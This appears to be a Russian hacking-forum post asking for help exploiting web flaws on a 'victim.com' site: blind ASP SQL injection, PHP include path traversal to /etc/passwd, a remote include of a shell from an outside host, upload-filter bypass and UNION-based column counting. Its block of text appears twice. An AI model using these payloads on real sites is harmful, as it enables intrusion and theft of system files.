все дело в том,что порой мне намного проще найти уязвимость,чем суметь её грамотно использовать.
Например
1)sql-инъекции в скриптах asp (слепые).
ну тут надо читать,это понятно. Но всё равно,париться надо часами - согласитесь.
2)php-инклюды с добавлением расширения и указанием текущей папки
(скажем /home/victim.com/www/pics/),исключающие возможность удаленного инклюда.Часто это получается
примерно так:
fopen(/home/victim.com/www/pics/../../../../../etc/passwd.html) - file not exists
аналогично:
fopen(/home/victim.com/www/pics/http://myshell.ru/path_to_shell/shell.html) --||--
(может быть не обязательно fopen,но думаю,суть ясна.
3) возможность загрузки файлов (движок на php) с строгой фильтрацией настоящего расширения,т.е конечного.
Как не переименовывай файл - php.2 php.txt php3 и тд. - скрипт разрешает только jpg,gif И swf. При таком раскладе php-код
никак не может выполнится.(или есть какой-то хитрый трюк,которого я не знаю)
4) иньекции mysql.
Часто бывают ошибки типа mysql_num_rows где используется SELECT * from news или похожее.Так вот тут никак не подобрать
кол-во полей. Допустим запрос union select * from users не даст нужного результата,не говоря уже о union select 1,2,3,..и т.д.
Вообщем,когда ломаешь один и тихо,натыкаешься на кучу подводных камней и без помощи тут никак не обойтись.
Например
1)sql-инъекции в скриптах asp (слепые).
ну тут надо читать,это понятно. Но всё равно,париться надо часами - согласитесь.
2)php-инклюды с добавлением расширения и указанием текущей папки
(скажем /home/victim.com/www/pics/),исключающие возможность удаленного инклюда.Часто это получается
примерно так:
fopen(/home/victim.com/www/pics/../../../../../etc/passwd.html) - file not exists
аналогично:
fopen(/home/victim.com/www/pics/http://myshell.ru/path_to_shell/shell.html) --||--
(может быть не обязательно fopen,но думаю,суть ясна.
3) возможность загрузки файлов (движок на php) с строгой фильтрацией настоящего расширения,т.е конечного.
Как не переименовывай файл - php.2 php.txt php3 и тд. - скрипт разрешает только jpg,gif И swf. При таком раскладе php-код
никак не может выполнится.(или есть какой-то хитрый трюк,которого я не знаю)
4) иньекции mysql.
Часто бывают ошибки типа mysql_num_rows где используется SELECT * from news или похожее.Так вот тут никак не подобрать
кол-во полей. Допустим запрос union select * from users не даст нужного результата,не говоря уже о union select 1,2,3,..и т.д.
Вообщем,когда ломаешь один и тихо,натыкаешься на кучу подводных камней и без помощи тут никак не обойтись.